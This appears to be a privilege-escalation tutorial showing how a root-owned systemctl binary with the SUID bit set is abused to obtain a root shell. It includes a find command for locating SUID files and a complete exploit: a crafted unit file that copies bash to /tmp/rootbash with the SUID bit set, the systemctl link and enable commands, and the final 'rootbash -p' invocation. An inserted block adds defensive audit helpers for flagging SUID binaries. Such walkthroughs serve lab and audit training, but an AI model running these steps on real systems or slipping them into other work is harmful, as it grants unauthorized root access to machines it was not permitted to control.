Exploiting SUID Bits: systemctl
The SUID bit (Set owner User ID) is a special permission in Unix/Linux systems that, when set on an executable file, allows that file to run with the permissions of the file's owner rather than those of the user who executes it. It is shown as an s in the owner's execute position of the permission bits, for example -rwsr-xr-x.
If a binary owned by root has the SUID bit set, it runs as root no matter who launches it. This is extremely useful for privilege escalation, since it can let us obtain a root shell.
In our case, the systemctl utility has been given the SUID bit. We can exploit this to gain a root shell by having systemctl start a service that copies /bin/bash to a file we control and sets the SUID bit on that copy. Because systemctl is SUID and owned by root, the service runs as root, so the copied bash is a root-owned SUID binary that gives us a root shell.
Tip: Locate all SUID bits with the command
find / -perm -u=s -type f 2>/dev/null
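As an added defensive counterpart (not part of the original post), the following POSIX shell helpers reuse the tip's find predicate on individual files, flag root-owned SUID binaries, and single out systemctl because it will load a caller-supplied unit file; the function names is_suid and audit_suid are chosen here.

```shell
#!/bin/sh
# Added audit helpers (not from the original post). They apply the page's
# find predicate (-perm -u=s -type f) to single files instead of the whole
# filesystem, so a short list of candidate paths can be checked quickly.

# is_suid FILE: prints "suid" if FILE is a regular file with the setuid bit,
# otherwise "nosuid" (a missing file also counts as "nosuid").
is_suid() {
    if [ -n "$(find "$1" -maxdepth 0 -perm -u=s -type f 2>/dev/null)" ]; then
        echo suid
    else
        echo nosuid
    fi
}

# audit_suid FILE...: prints one line per SUID file. Root-owned SUID files are
# marked HIGH because they run as root for any caller; systemctl gets an extra
# note since, as shown on this page, it links and starts whatever unit file
# the caller hands it.
audit_suid() {
    for f in "$@"; do
        [ "$(is_suid "$f")" = suid ] || continue
        owner=$(ls -ld "$f" | awk '{print $3}')
        if [ "$owner" = root ]; then
            level=HIGH
        else
            level=LOW
        fi
        case "$(basename "$f")" in
            systemctl) note=" [systemctl: runs caller-supplied unit files]" ;;
            *) note="" ;;
        esac
        echo "$level $f (owner: $owner)$note"
    done
}

# Typical invocation over likely locations; once a finding is confirmed
# unnecessary, the bit is removed with: chmod u-s FILE
# audit_suid /bin/systemctl /usr/bin/systemctl /usr/bin/passwd
```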
Exploitation
First, we create a unit file that tells systemctl, when the service is started, to copy /bin/bash to /tmp/rootbash and set the SUID bit on that copy:
cat <<EOF > /tmp/rootme.service
[Unit]
Description=Root shell
[Service]
Type=simple
ExecStart=/bin/bash -c 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash'
[Install]
WantedBy=multi-user.target
EOF
We then register this file with systemctl:
/bin/systemctl link /tmp/rootme.service
We can then enable the service:
/bin/systemctl enable --now rootme.service
Finally, we run our rootbash file:
/tmp/rootbash -p
Note that -p tells bash NOT to drop privileges. (Normally, when bash is run from a SUID binary, it drops the elevated privileges for safety.)
We should successfully obtain a root shell from this!